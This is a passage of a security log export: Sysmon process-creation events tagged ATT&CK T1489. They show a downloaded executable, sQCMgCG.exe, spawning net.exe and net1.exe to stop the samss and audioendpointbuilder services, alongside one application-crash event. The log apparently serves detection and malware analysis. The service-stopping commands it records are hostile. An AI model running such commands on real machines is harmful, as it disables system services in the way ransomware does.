MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.508668300Z"",""eventRecordID"":""1708"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.500\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00}\r\nProcessId: 207656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.500"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010bd261d00}"",""processId"":""207656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:40.996",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.433 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010ad201d00} +ProcessId: 207632 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00} +ParentProcessId: 207540 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.440236600Z"",""eventRecordID"":""1707"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.433\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010ad201d00}\r\nProcessId: 207632\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00}\r\nParentProcessId: 207540\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.433"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010ad201d00}"",""processId"":""207632"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1af3-5ec9-0000-001049181d00}"",""parentProcessId"":""207540"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:40.982",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.287 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00} +ProcessId: 207540 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.297335400Z"",""eventRecordID"":""1706"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.287\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00}\r\nProcessId: 207540\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.287"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-001049181d00}"",""processId"":""207540"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:39.833",10,"Multiple Windows error Application events","""Faulting application name: SearchProtocolHost.exe, version: 7.0.18362.719, time stamp: 0x90c89b37 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1314 +Faulting application start time: 0x01d630ffc4c2980b +Faulting application path: C:\Windows\system32\SearchProtocolHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e71cb7f2-a0e1-4431-a6ac-7b969dc37105 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:45:13.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.987 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-0010984c1600} +ProcessId: 166152 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600} +ParentProcessId: 166036 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.989429300Z"",""eventRecordID"":""1699"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.987\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-0010984c1600}\r\nProcessId: 166152\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600}\r\nParentProcessId: 166036\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.987"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-0010984c1600}"",""processId"":""166152"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ad6-5ec9-0000-001032481600}"",""parentProcessId"":""166036"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:13.512",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.890 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600} +ProcessId: 166036 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.896014800Z"",""eventRecordID"":""1698"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.890\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600}\r\nProcessId: 166036\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.890"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001032481600}"",""processId"":""166036"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:13.496",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.780 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001049441600} +ProcessId: 165796 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600} +ParentProcessId: 165592 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.784816400Z"",""eventRecordID"":""1697"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.780\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001049441600}\r\nProcessId: 165796\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600}\r\nParentProcessId: 165592\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.780"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001049441600}"",""processId"":""165796"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ad6-5ec9-0000-001034401600}"",""parentProcessId"":""165592"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:13.465",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.636 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600} +ProcessId: 165592 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.640098400Z"",""eventRecordID"":""1696"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.636\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600}\r\nProcessId: 165592\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 